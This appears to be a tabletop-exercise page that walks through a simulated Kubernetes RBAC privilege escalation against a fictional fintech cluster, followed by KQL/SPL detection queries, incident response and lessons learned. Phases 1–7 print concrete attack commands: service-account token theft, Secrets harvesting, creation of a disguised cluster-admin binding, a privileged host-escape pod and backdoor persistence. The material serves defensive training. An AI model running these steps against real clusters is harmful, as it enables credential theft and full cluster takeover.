Skip to content

SC-085: Kubernetes RBAC Privilege Escalation — Operation CLUSTER CROWN

Scenario Overview

Field Detail
ID SC-085
Category Cloud Security / Kubernetes / Privilege Escalation
Severity Critical
ATT&CK Tactics Initial Access, Persistence, Privilege Escalation, Discovery, Lateral Movement
ATT&CK Techniques T1078.004 (Valid Accounts: Cloud Accounts), T1613 (Container and Resource Discovery), T1611 (Escape to Host), T1098 (Account Manipulation)
Target Environment Multi-tenant Kubernetes cluster (v1.29) running production workloads with RBAC, network policies, and admission controllers on a major cloud provider
Difficulty ★★★★★
Duration 3–4 hours
Estimated Impact Full cluster admin compromise from initial namespace-scoped service account; lateral movement across 6 namespaces; exfiltration of 14 Secrets objects including database credentials and TLS certificates; persistent backdoor ClusterRoleBinding surviving pod restarts; 18-hour containment and remediation

Narrative

Orion Cloud Systems, a fictional fintech SaaS provider, operates a 120-node Kubernetes cluster on a managed cloud platform. The cluster hosts their core payment processing platform, customer API gateway, internal tooling, and CI/CD pipeline runners. The cluster runs at 10.100.0.0/16 with the API server at api.k8s.orion.example.com (198.51.100.30).

The cluster uses RBAC for access control, with namespace-scoped Roles for application service accounts and ClusterRoles for platform engineering. Pod Security Standards are set to "baseline" (not "restricted"), and the cluster runs an admission controller for basic image verification. Approximately 340 pods run across 12 namespaces, processing 8 million API requests per day.

In April 2026, a threat actor group designated KUBE PHANTOM — a cloud-focused APT specializing in Kubernetes and container orchestration exploitation — targets Orion's cluster through a compromised CI/CD pipeline runner pod. The attack begins with service account token theft from a misconfigured pod, escalates through RBAC enumeration and ClusterRoleBinding abuse, and culminates in full cluster admin access with persistent backdoors.

Attack Flow

graph TD
    A[Phase 1: Initial Foothold<br/>Compromised CI/CD runner pod via supply chain] --> B[Phase 2: Service Account Token Theft<br/>Extract mounted SA token from pod filesystem]
    B --> C[Phase 3: RBAC Enumeration<br/>Map permissions, roles, and bindings across cluster]
    C --> D[Phase 4: Secrets Harvesting<br/>Read accessible Secrets in permitted namespaces]
    D --> E[Phase 5: ClusterRoleBinding Abuse<br/>Escalate to cluster-admin via overprivileged binding]
    E --> F[Phase 6: Pod Escape to Host<br/>Privileged container breakout to node OS]
    F --> G[Phase 7: Persistence & Lateral Movement<br/>Backdoor ClusterRoleBinding + cross-namespace pivot]
    G --> H[Phase 8: Detection & Response<br/>Audit log anomalies + RBAC change alerts]

Phase Details

Phase 1: Initial Foothold — Compromised CI/CD Runner

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts)

KUBE PHANTOM identifies that Orion's CI/CD system (a self-hosted GitLab Runner) executes pipeline jobs as Kubernetes pods in the cicd-runners namespace. A supply chain compromise in a widely-used build dependency (a malicious post-install script in a package version) gives the attacker code execution inside a runner pod during a routine build job.

# Simulated initial foothold (educational only)
# Attacker gains shell in CI/CD runner pod

# Pod identity and environment reconnaissance
$ hostname
runner-pipeline-7a3f-build-28491

$ cat /etc/os-release | head -2
NAME="Ubuntu"
VERSION="22.04.4 LTS (Jammy Jellyfish)"

$ env | grep -i kube
KUBERNETES_SERVICE_HOST=10.100.0.1
KUBERNETES_SERVICE_PORT=443
KUBERNETES_PORT=tcp://10.100.0.1:443

# Check what namespace we're in
$ cat /var/run/secrets/kubernetes.io/serviceaccount/namespace
cicd-runners

# Network reconnaissance from inside the pod
$ ip addr show eth0
    inet 10.100.42.18/24 brd 10.100.42.255 scope global eth0

# DNS discovery of cluster services
$ nslookup kubernetes.default.svc.cluster.local
Server:    10.100.0.10
Address:   10.100.0.10#53
Name:      kubernetes.default.svc.cluster.local
Address:   10.100.0.1

Phase 2: Service Account Token Theft

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts)

The runner pod has a Kubernetes service account token automatically mounted at the standard path. While this is default behavior, the cicd-runner-sa service account has been granted overly broad permissions to support pipeline operations — it can create and manage pods, read ConfigMaps and Secrets in its namespace, and list resources across namespaces.

# Simulated token theft (educational only)
# Extract the mounted service account token

$ ls -la /var/run/secrets/kubernetes.io/serviceaccount/
total 4
lrwxrwxrwx 1 root root   13 Apr  1 08:00 ca.crt -> ..data/ca.crt
lrwxrwxrwx 1 root root   16 Apr  1 08:00 namespace -> ..data/namespace
lrwxrwxrwx 1 root root   12 Apr  1 08:00 token -> ..data/token

# Read the service account JWT token
$ SA_TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
$ echo $SA_TOKEN | cut -d. -f2 | base64 -d 2>/dev/null | python3 -m json.tool
{
    "iss": "https://api.k8s.orion.example.com",
    "sub": "system:serviceaccount:cicd-runners:cicd-runner-sa",
    "aud": ["https://api.k8s.orion.example.com"],
    "exp": 1743580800,
    "iat": 1711958400,
    "nbf": 1711958400
}

# Verify the token works against the API server
$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/cicd-runners/pods \
    | python3 -c "import sys,json; data=json.load(sys.stdin); print(f'Pods found: {len(data[\"items\"])}')"
Pods found: 14

# The token is valid and can enumerate pods in the cicd-runners namespace

Phase 3: RBAC Enumeration

ATT&CK Technique: T1613 (Container and Resource Discovery)

Using the stolen service account token, KUBE PHANTOM systematically enumerates the cluster's RBAC configuration to identify privilege escalation paths. The cicd-runner-sa has list permissions on ClusterRoles and ClusterRoleBindings — a common misconfiguration in CI/CD service accounts that need to deploy resources across namespaces.

# Simulated RBAC enumeration (educational only)
# Check what the current service account can do

$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
    -X POST -H "Content-Type: application/json" \
    -d '{"apiVersion":"authorization.k8s.io/v1",
         "kind":"SelfSubjectRulesReview",
         "spec":{"namespace":"cicd-runners"}}'

# Key permissions discovered:
# - pods: [get, list, create, delete] in cicd-runners
# - secrets: [get, list] in cicd-runners
# - configmaps: [get, list] in cicd-runners
# - clusterroles: [list] cluster-wide
# - clusterrolebindings: [list, create] cluster-wide  ← CRITICAL FINDING
# - namespaces: [list] cluster-wide

# Enumerate all ClusterRoleBindings
$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
for item in data['items']:
    role = item['roleRef']['name']
    subjects = [s.get('name','?') for s in item.get('subjects',[])]
    print(f'{item[\"metadata\"][\"name\"]:45} -> {role:30} subjects={subjects}')
"

# Output (abbreviated):
# system:controller:deployment-ctrl             -> system:controller:deployment   subjects=['deployment-controller']
# cicd-deployer-binding                         -> cicd-deployer-role             subjects=['cicd-runner-sa']
# platform-admin-binding                        -> cluster-admin                  subjects=['platform-admin-sa']
# legacy-monitoring-binding                     -> cluster-admin                  subjects=['monitoring-sa']  ← TARGET

# CRITICAL: legacy-monitoring-binding grants cluster-admin to monitoring-sa
# If we can impersonate or obtain monitoring-sa, we get full cluster control

# Enumerate namespaces to map the attack surface
$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
for ns in data['items']:
    print(ns['metadata']['name'])
"
# default
# kube-system
# kube-public
# cicd-runners
# payments-prod
# payments-staging
# customer-api
# internal-tools
# monitoring
# logging
# cert-manager
# ingress-nginx

Phase 4: Secrets Harvesting

ATT&CK Technique: T1078.004 (Valid Accounts: Cloud Accounts)

Before escalating privileges, KUBE PHANTOM harvests all accessible Secrets in the cicd-runners namespace. These include image pull secrets, pipeline credentials, and — critically — a service account token for the monitoring namespace stored as a CI/CD deployment secret.

# Simulated secrets harvesting (educational only)
# List all secrets in cicd-runners namespace

$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/cicd-runners/secrets \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
for s in data['items']:
    print(f'{s[\"metadata\"][\"name\"]:45} type={s[\"type\"]}')
"

# Output:
# default-token-x7k2p                           type=kubernetes.io/service-account-token
# cicd-runner-sa-token-m3j8                      type=kubernetes.io/service-account-token
# registry-pull-secret                           type=kubernetes.io/dockerconfigjson
# gitlab-deploy-token                            type=Opaque
# monitoring-deploy-sa-token                     type=Opaque  ← HIGH VALUE TARGET
# payments-db-deploy-creds                       type=Opaque
# tls-wildcard-orion-example                     type=kubernetes.io/tls

# Extract the monitoring deployment service account token
$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/cicd-runners/secrets/monitoring-deploy-sa-token \
    | python3 -c "
import sys, json, base64
data = json.load(sys.stdin)
token = base64.b64decode(data['data']['token']).decode()
# Decode JWT payload
import json as j
payload = j.loads(base64.b64decode(token.split('.')[1] + '=='))
print(f'Subject: {payload[\"sub\"]}')
print(f'Namespace: monitoring')
"

# Subject: system:serviceaccount:monitoring:monitoring-sa
# This is the service account bound to cluster-admin via legacy-monitoring-binding!

# Total secrets harvested: 7 objects
# Critical findings:
# - monitoring-sa token → cluster-admin access
# - payments-db-deploy-creds → database credentials (testuser/REDACTED)
# - tls-wildcard-orion-example → wildcard TLS cert for *.orion.example.com

Phase 5: ClusterRoleBinding Abuse — Escalation to Cluster Admin

ATT&CK Technique: T1098 (Account Manipulation)

KUBE PHANTOM now has two paths to cluster-admin: (1) use the stolen monitoring-sa token directly, or (2) create a new ClusterRoleBinding granting cluster-admin to the cicd-runner-sa. The attacker uses both — the monitoring-sa token for immediate access, and a new ClusterRoleBinding for persistence.

# Simulated privilege escalation (educational only)
# Path 1: Use stolen monitoring-sa token for immediate cluster-admin access

$ MONITORING_TOKEN="<extracted-from-secret>"

# Verify cluster-admin access
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/kube-system/secrets \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
print(f'kube-system secrets accessible: {len(data[\"items\"])}')
"
# kube-system secrets accessible: 23
# CONFIRMED: Full cluster-admin access achieved

# Path 2: Create persistent ClusterRoleBinding for cicd-runner-sa
# The cicd-runner-sa has 'create' permission on ClusterRoleBindings

$ curl -sk -H "Authorization: Bearer $SA_TOKEN" \
    https://10.100.0.1:443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "rbac.authorization.k8s.io/v1",
      "kind": "ClusterRoleBinding",
      "metadata": {
        "name": "system-node-proxy-binding",
        "labels": {
          "kubernetes.io/bootstrapping": "rbac-defaults"
        }
      },
      "roleRef": {
        "apiGroup": "rbac.authorization.k8s.io",
        "kind": "ClusterRole",
        "name": "cluster-admin"
      },
      "subjects": [
        {
          "kind": "ServiceAccount",
          "name": "cicd-runner-sa",
          "namespace": "cicd-runners"
        }
      ]
    }'

# Response: 201 Created
# The new ClusterRoleBinding is named to blend with system bindings
# and labeled to appear as an RBAC bootstrap default

Phase 6: Pod Escape to Host

ATT&CK Technique: T1611 (Escape to Host)

With cluster-admin privileges, KUBE PHANTOM creates a privileged pod that mounts the host filesystem, enabling breakout from the container to the underlying node OS. This provides access to kubelet credentials, other pod data on the node, and the ability to tamper with node-level components.

# Simulated pod escape (educational only)
# Create a privileged pod mounting the host filesystem

$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/kube-system/pods \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "v1",
      "kind": "Pod",
      "metadata": {
        "name": "node-debug-utility",
        "namespace": "kube-system",
        "labels": {
          "app": "node-debug",
          "tier": "infrastructure"
        }
      },
      "spec": {
        "hostPID": true,
        "hostNetwork": true,
        "containers": [{
          "name": "debug",
          "image": "registry.orion.example.com/base/ubuntu:22.04",
          "command": ["/bin/sleep", "86400"],
          "securityContext": {
            "privileged": true
          },
          "volumeMounts": [{
            "name": "host-root",
            "mountPath": "/host"
          }]
        }],
        "volumes": [{
          "name": "host-root",
          "hostPath": {
            "path": "/",
            "type": "Directory"
          }
        }],
        "nodeSelector": {
          "node-role.kubernetes.io/control-plane": ""
        },
        "tolerations": [{
          "operator": "Exists"
        }]
      }
    }'

# Response: 201 Created — pod scheduled on control-plane node

# Execute commands on the host via the privileged pod
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    "https://10.100.0.1:443/api/v1/namespaces/kube-system/pods/node-debug-utility/exec?command=chroot&command=/host&command=/bin/bash&command=-c&command=id%20%26%26%20hostname&stdin=false&stdout=true&stderr=true"

# uid=0(root) gid=0(root) groups=0(root)
# k8s-control-01.orion.example.com

# Access kubelet credentials on the node
# $ chroot /host cat /etc/kubernetes/kubelet.conf
# (contains kubelet client certificate — full node-level access)

# Enumerate all pods on this node
# $ chroot /host crictl ps --output json | jq '.containers[].metadata.name'
# "kube-apiserver"
# "kube-controller-manager"
# "etcd"
# "kube-scheduler"
# "coredns"
# "node-debug-utility"

Phase 7: Persistence & Lateral Movement

ATT&CK Technique: T1098 (Account Manipulation), T1613 (Container and Resource Discovery)

KUBE PHANTOM establishes multiple persistence mechanisms and pivots across namespaces to access high-value workloads. The attacker creates additional backdoor service accounts, deploys a CronJob for persistent access, and harvests secrets from the payments-prod namespace.

# Simulated persistence and lateral movement (educational only)

# Persistence 1: Create a backdoor service account in kube-system
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/kube-system/serviceaccounts \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "v1",
      "kind": "ServiceAccount",
      "metadata": {
        "name": "system-proxy-controller",
        "namespace": "kube-system",
        "labels": {
          "kubernetes.io/cluster-service": "true"
        }
      }
    }'

# Bind it to cluster-admin
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "rbac.authorization.k8s.io/v1",
      "kind": "ClusterRoleBinding",
      "metadata": {
        "name": "system-proxy-controller-binding"
      },
      "roleRef": {
        "apiGroup": "rbac.authorization.k8s.io",
        "kind": "ClusterRole",
        "name": "cluster-admin"
      },
      "subjects": [{
        "kind": "ServiceAccount",
        "name": "system-proxy-controller",
        "namespace": "kube-system"
      }]
    }'

# Persistence 2: CronJob for recurring token refresh
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/apis/batch/v1/namespaces/kube-system/cronjobs \
    -X POST -H "Content-Type: application/json" \
    -d '{
      "apiVersion": "batch/v1",
      "kind": "CronJob",
      "metadata": {
        "name": "node-health-checker",
        "namespace": "kube-system"
      },
      "spec": {
        "schedule": "*/30 * * * *",
        "jobTemplate": {
          "spec": {
            "template": {
              "spec": {
                "serviceAccountName": "system-proxy-controller",
                "containers": [{
                  "name": "health-check",
                  "image": "registry.orion.example.com/base/alpine:3.19",
                  "command": ["/bin/sh", "-c",
                    "TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token); curl -sk -H \"Authorization: Bearer $TOKEN\" https://10.100.0.1:443/api/v1/namespaces/kube-system/secrets/system-proxy-controller-token -o /dev/null"]
                }],
                "restartPolicy": "OnFailure"
              }
            }
          }
        }
      }
    }'

# Lateral movement: Access payments-prod namespace secrets
$ curl -sk -H "Authorization: Bearer $MONITORING_TOKEN" \
    https://10.100.0.1:443/api/v1/namespaces/payments-prod/secrets \
    | python3 -c "
import sys, json
data = json.load(sys.stdin)
for s in data['items']:
    print(f'{s[\"metadata\"][\"name\"]:45} type={s[\"type\"]}')
"
# payments-db-credentials                        type=Opaque
# stripe-api-key                                 type=Opaque
# payment-processor-tls                          type=kubernetes.io/tls
# encryption-key-master                          type=Opaque
# jwt-signing-key                                type=Opaque

# Total namespaces accessed: 6 (cicd-runners, monitoring, kube-system,
#   payments-prod, customer-api, internal-tools)
# Total secrets harvested: 14 across all namespaces
# Persistence mechanisms: 2 (backdoor SA + CronJob)

Phase 8: Detection & Response

The attack is detected through multiple monitoring channels:

Channel 1 (T+1.5 hours): Kubernetes Audit Log Alert — The cluster's audit logging detects creation of a new ClusterRoleBinding granting cluster-admin. This matches a high-fidelity detection rule for RBAC changes outside of approved GitOps workflows.

Channel 2 (T+2 hours): Privileged Pod Alert — The admission controller (running in audit mode, not enforce) logs the creation of a privileged pod in kube-system with hostPID, hostNetwork, and host filesystem mounts. The runtime security agent flags the chroot syscall.

Channel 3 (T+3 hours): Anomalous API Access Patterns — Cloud-native SIEM detects that the cicd-runner-sa service account is making API calls to namespaces and resource types far outside its historical baseline (kube-system secrets, payments-prod secrets).

# Simulated detection timeline (educational only)
[2026-04-01 10:32:18 UTC] K8S AUDIT — RBAC CHANGE ALERT
  Source: api.k8s.orion.example.com
  Alert: CLUSTERROLEBINDING_CREATED
  Details:
    - Name: system-node-proxy-binding
    - RoleRef: cluster-admin
    - Subject: cicd-runner-sa (cicd-runners namespace)
    - Created by: system:serviceaccount:cicd-runners:cicd-runner-sa
    - NOT via GitOps pipeline (argocd-application-controller)
  Severity: CRITICAL
  Action: SOC escalation

[2026-04-01 11:05:44 UTC] RUNTIME SECURITY — PRIVILEGED POD ALERT
  Source: runtime-agent on k8s-control-01.orion.example.com
  Alert: PRIVILEGED_CONTAINER_CREATED
  Details:
    - Pod: kube-system/node-debug-utility
    - Privileged: true, HostPID: true, HostNetwork: true
    - Volume: hostPath / mounted at /host
    - Syscall: chroot detected
    - Image: registry.orion.example.com/base/ubuntu:22.04
  Severity: CRITICAL
  Action: Pod quarantine + node isolation

[2026-04-01 12:18:33 UTC] SIEM — ANOMALOUS API ACCESS
  Source: k8s-audit-log-forwarder
  Alert: SERVICE_ACCOUNT_SCOPE_VIOLATION
  Details:
    - Service account: cicd-runner-sa (cicd-runners)
    - Accessed namespaces: kube-system, payments-prod, customer-api
    - Historical baseline: cicd-runners only
    - Resource types accessed: secrets, serviceaccounts, clusterrolebindings
    - API call volume: 147 calls in 2 hours (baseline: 12/hour)
  Risk Score: 98/100
  Action: Token revocation + full cluster audit

Detection Queries:

// KQL — Detect ClusterRoleBinding creation granting cluster-admin
KubernetesAuditLog
| where TimeGenerated > ago(24h)
| where Verb == "create"
| where ObjectRef_Resource == "clusterrolebindings"
| extend RoleRef = parse_json(RequestObject).roleRef.name
| where RoleRef == "cluster-admin"
| extend CreatedBy = User_Username
| where CreatedBy !in ("system:serviceaccount:argocd:argocd-application-controller",
                        "system:serviceaccount:flux-system:flux-controller")
| project TimeGenerated, CreatedBy, ObjectRef_Name, RoleRef,
          SourceIPs, UserAgent

// KQL — Detect privileged pod creation with host access
KubernetesAuditLog
| where TimeGenerated > ago(24h)
| where Verb == "create"
| where ObjectRef_Resource == "pods"
| extend PodSpec = parse_json(RequestObject).spec
| where PodSpec.hostPID == true
    or PodSpec.hostNetwork == true
    or tostring(PodSpec.containers) has "privileged\":true"
    or tostring(PodSpec.volumes) has "hostPath"
| project TimeGenerated, User_Username, ObjectRef_Namespace,
          ObjectRef_Name, SourceIPs

// KQL — Detect service account accessing secrets across namespaces
KubernetesAuditLog
| where TimeGenerated > ago(6h)
| where ObjectRef_Resource == "secrets"
| where Verb in ("get", "list")
| where User_Username startswith "system:serviceaccount:"
| extend SA_Namespace = extract("system:serviceaccount:([^:]+):", 1, User_Username)
| where SA_Namespace != ObjectRef_Namespace
| summarize NamespacesAccessed = make_set(ObjectRef_Namespace),
            SecretsAccessed = dcount(ObjectRef_Name),
            CallCount = count()
  by User_Username, bin(TimeGenerated, 1h)
| where SecretsAccessed > 3 or array_length(NamespacesAccessed) > 2
| project TimeGenerated, User_Username, NamespacesAccessed,
          SecretsAccessed, CallCount

// KQL — Detect anomalous CronJob creation in kube-system
KubernetesAuditLog
| where TimeGenerated > ago(24h)
| where Verb == "create"
| where ObjectRef_Resource == "cronjobs"
| where ObjectRef_Namespace == "kube-system"
| project TimeGenerated, User_Username, ObjectRef_Name,
          SourceIPs, UserAgent
# SPL — Detect ClusterRoleBinding creation granting cluster-admin
index=kubernetes sourcetype=kube:apiserver:audit
  verb="create" objectRef.resource="clusterrolebindings"
| spath output=role_ref path=requestObject.roleRef.name
| where role_ref="cluster-admin"
| spath output=created_by path=user.username
| where NOT match(created_by, "(argocd-application-controller|flux-controller)")
| table _time, created_by, objectRef.name, role_ref, sourceIPs{},
        userAgent

# SPL — Detect privileged pod creation with host access
index=kubernetes sourcetype=kube:apiserver:audit
  verb="create" objectRef.resource="pods"
| spath output=host_pid path=requestObject.spec.hostPID
| spath output=host_net path=requestObject.spec.hostNetwork
| spath output=containers path=requestObject.spec.containers{}
| where host_pid="true" OR host_net="true"
    OR match(containers, "privileged.{0,5}true")
    OR match(containers, "hostPath")
| table _time, user.username, objectRef.namespace, objectRef.name,
        host_pid, host_net, sourceIPs{}

# SPL — Detect service account accessing secrets across namespaces
index=kubernetes sourcetype=kube:apiserver:audit
  objectRef.resource="secrets" verb IN ("get", "list")
  user.username="system:serviceaccount:*"
| rex field=user.username "system:serviceaccount:(?<sa_namespace>[^:]+):"
| where sa_namespace != 'objectRef.namespace'
| bin _time span=1h
| stats dc(objectRef.name) as secrets_accessed,
        values(objectRef.namespace) as namespaces_accessed,
        count as call_count
  by user.username, _time
| where secrets_accessed > 3 OR mvcount(namespaces_accessed) > 2
| table _time, user.username, namespaces_accessed, secrets_accessed,
        call_count

# SPL — Detect anomalous CronJob creation in kube-system
index=kubernetes sourcetype=kube:apiserver:audit
  verb="create" objectRef.resource="cronjobs"
  objectRef.namespace="kube-system"
| table _time, user.username, objectRef.name, sourceIPs{}, userAgent

Incident Response:

# Simulated incident response (educational only)
[2026-04-01 12:30:00 UTC] ALERT: Kubernetes Security Incident Response activated

[2026-04-01 12:35:00 UTC] ACTION: Immediate containment
  - cicd-runner-sa token REVOKED
  - monitoring-sa token REVOKED
  - system-proxy-controller SA DELETED
  - Malicious ClusterRoleBindings DELETED:
    system-node-proxy-binding
    system-proxy-controller-binding

[2026-04-01 12:45:00 UTC] ACTION: Pod quarantine
  - node-debug-utility pod TERMINATED
  - node-health-checker CronJob DELETED
  - All cicd-runner pods TERMINATED and rebuilt
  - k8s-control-01 node CORDONED for forensic analysis

[2026-04-01 13:00:00 UTC] ACTION: Secret rotation
  - All secrets in affected namespaces ROTATED
  - payments-db-credentials: password rotated
  - stripe-api-key: key rotated via provider
  - TLS certificates: reissued
  - JWT signing keys: rotated with grace period

[2026-04-01 14:00:00 UTC] ACTION: RBAC hardening
  - Pod Security Standards: elevated to "restricted"
  - Admission controller: enforce mode enabled
  - ClusterRoleBinding create: restricted to GitOps SA only
  - automountServiceAccountToken: false on all non-essential pods
  - Network policies: namespace isolation enforced

[2026-04-01 18:00:00 UTC] ACTION: Impact assessment
  Namespaces compromised: 6
  Secrets exfiltrated: 14 objects
  Persistence mechanisms: 2 (both removed)
  Node-level access: 1 control-plane node
  Data exposure: database credentials, API keys, TLS certs (all rotated)
  Lateral movement: confirmed across 6 namespaces

Decision Points (Tabletop Exercise)

Decision Point 1 — Pre-Incident

Your CI/CD runner pods need to deploy resources across namespaces. How do you scope their RBAC permissions to allow legitimate operations while preventing the privilege escalation chain described in this scenario? What is the minimum permission set?

Decision Point 2 — During Detection

You detect a new ClusterRoleBinding granting cluster-admin, but it was created by a legitimate service account (cicd-runner-sa). The CI/CD team says they did not create it, but they also cannot confirm the SA was not compromised. How do you triage this without disrupting active deployments?

Decision Point 3 — Scope Assessment

After confirming cluster-admin compromise, you need to determine the blast radius. The attacker had access for approximately 2 hours before detection. How do you identify all resources accessed, modified, or created during this window? What audit log fields are most critical?

Decision Point 4 — Post-Incident

Your investigation reveals that the root cause was a CI/CD service account with create permission on ClusterRoleBindings. How do you redesign the CI/CD RBAC model to support multi-namespace deployments without granting escalation-enabling permissions? Consider GitOps-based alternatives.

Lessons Learned

Key Takeaways

  1. Service account tokens mounted in pods are pre-staged credentials for attackers — Any pod compromise immediately yields a Kubernetes API credential. Disable automatic token mounting (automountServiceAccountToken: false) on all pods that do not need API access. Use projected service account tokens with audience and expiry constraints.

  2. ClusterRoleBinding create permission is a cluster-admin equivalent — Any principal that can create ClusterRoleBindings can grant itself or others cluster-admin. This permission must be restricted to a minimal set of principals (ideally only GitOps controllers) and monitored with high-fidelity alerts.

  3. Legacy RBAC bindings accumulate as hidden privilege escalation paths — The legacy-monitoring-binding granting cluster-admin to monitoring-sa was created years ago and never cleaned up. Regular RBAC audits must identify and remove overprivileged bindings. Tools like rbac-police and kubectl-who-can help map escalation paths.

  4. Pod Security Standards must be enforced, not just audited — Running admission controllers in audit mode provides visibility but not prevention. The privileged pod that enabled host escape would have been blocked by "restricted" Pod Security Standards in enforce mode.

  5. Kubernetes audit logs are the primary detection surface — Every API call to the Kubernetes API server is logged. High-fidelity detections for ClusterRoleBinding changes, privileged pod creation, cross-namespace secret access, and service account creation in kube-system are essential baseline alerts.

  6. GitOps workflows provide an RBAC choke point — When all cluster changes flow through a GitOps controller (ArgoCD, Flux), direct API access by service accounts can be heavily restricted. Any cluster mutation not originating from the GitOps controller is immediately suspicious.

MITRE ATT&CK Mapping

Technique ID Technique Name Phase
T1078.004 Valid Accounts: Cloud Accounts Initial Access (SA token theft)
T1613 Container and Resource Discovery Discovery (RBAC enumeration)
T1098 Account Manipulation Privilege Escalation (ClusterRoleBinding creation)
T1611 Escape to Host Privilege Escalation (privileged pod breakout)
T1078.004 Valid Accounts: Cloud Accounts Lateral Movement (cross-namespace secret access)
T1053.007 Scheduled Task/Job: Container Orchestration Job Persistence (CronJob backdoor)
T1136.001 Create Account: Local Account Persistence (backdoor service account)